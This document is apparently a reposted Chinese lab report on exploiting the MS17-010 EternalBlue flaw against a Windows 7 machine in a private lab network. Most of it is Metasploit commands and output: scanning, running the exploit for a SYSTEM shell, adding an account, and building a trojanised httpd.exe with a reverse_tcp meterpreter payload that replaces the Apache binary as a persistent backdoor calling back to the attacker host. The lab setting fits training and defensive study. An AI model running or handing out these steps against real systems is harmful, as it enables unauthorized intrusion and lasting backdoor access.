利用永恒之蓝渗透WIN7
實(shí)驗(yàn)名稱:利用永恒之藍(lán)滲透win7
實(shí)驗(yàn)人:xx
實(shí)驗(yàn)日期:2021.9.24
實(shí)驗(yàn)?zāi)康?#xff1a;通過已知漏洞攻擊目標(biāo)服務(wù)器并拿到shell
實(shí)驗(yàn)環(huán)境:
kali:172.16.12.30
win7靶機(jī):172.16.12.4 用戶名:administrator 密碼:vgrant
實(shí)驗(yàn)步驟:
配置靶機(jī)防火墻,將相應(yīng)的“阻塞端口安全策略”————Disabled
查看MS17-010相關(guān)模塊,并使用序號(hào)3掃描模塊掃描目標(biāo)及
msf6 > search ms17-010
msf6 > use 3
查看模塊參數(shù)并設(shè)置目標(biāo)機(jī)IP,執(zhí)行掃描,未發(fā)現(xiàn)相關(guān)漏洞
msf6 auxiliary(admin/smb/ms17_010_command) > show options
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 auxiliary(admin/smb/ms17_010_command) > run
換序號(hào)4模塊進(jìn)行掃描,設(shè)置目標(biāo)主機(jī),執(zhí)行掃描,發(fā)現(xiàn)漏洞
msf6 > search ms17-010
msf6 > use 4
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
查找攻擊模塊,并使用
msf6 > search ms17-010
msf6 > use 0
查看設(shè)置模塊,并設(shè)置目標(biāo)主機(jī)ip,執(zhí)行run
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.12.4
rhosts => 172.16.12.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
滲透成功
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > pwd C:\Windows\system32
對(duì)目標(biāo)及實(shí)施攻擊
截取屏幕
創(chuàng)建賬戶
meterpreter > shell #進(jìn)入目標(biāo)機(jī)shell
C:\Windows\system32>net user #查看當(dāng)前賬戶
創(chuàng)建賬戶cuiyi
C:\Windows\system32>net user cuiyi /add
創(chuàng)建后門
meterpreter > ps -S httpd.exe
meterpreter > kill 3212 #先殺死進(jìn)程才能下載,下載后調(diào)到后臺(tái)
meterpreter > download c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
制作后門文件
msf6 exploit(windows/smb/ms17_010_eternalblue) > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.16.12.30
lhost => 172.16.12.30
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -p windows -x /root/desktop/httpd.exe -k -f exe -o /root/httpd_door.exe
[*] Writing 29184 bytes to /root/httpd_door.exe...
啟動(dòng)監(jiān)聽,監(jiān)聽后門的反向連接,并用run -j到到后臺(tái)
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
msf6 exploit(multi/handler) > set lhost 172.16.12.30
lhost => 172.16.12.30
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 172.16.12.30:4444
切回之前保存后臺(tái)的會(huì)話,上傳后門文件并重命名
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ METASPLOITABLE3 172.16.12.30:4444 -> 172.16.12.4:49609 (172.16.12.4)
msf6 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...
meterpreter > cd c:\\wamp\\bin\\apache\\apache2.2.21\\bin\\
meterpreter > pwd
c:\wamp\bin\apache\apache2.2.21\bin
meterpreter > mv httpd.exe httpd.exe.bak
meterpreter > upload /root/httpd_door.exe
[*] uploading : /root/httpd_door.exe -> httpd_door.exe
[*] Uploaded 28.50 KiB of 28.50 KiB (100.0%): /root/httpd_door.exe -> httpd_door.exe
[*] uploaded : /root/httpd_door.exe -> httpd_door.exe
meterpreter > mv httpd_door.exe httpd.exe
重啟wampapache服務(wù),服務(wù)器啟動(dòng)后,返回了新的會(huì)話(最后一行)
exploit/multi/handler 保持監(jiān)聽狀態(tài),每當(dāng)對(duì)端的“httpd.exe” 重啟,這邊就會(huì)啟動(dòng)會(huì)話
重啟wampapache
返回kaili看到成功建立連接
總結(jié)
以上是生活随笔為你收集整理的利用永恒之蓝渗透WIN7的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 试用 Code With Me 果然很牛
- 下一篇: 计算机网络实践项目(大学宿舍网络部署)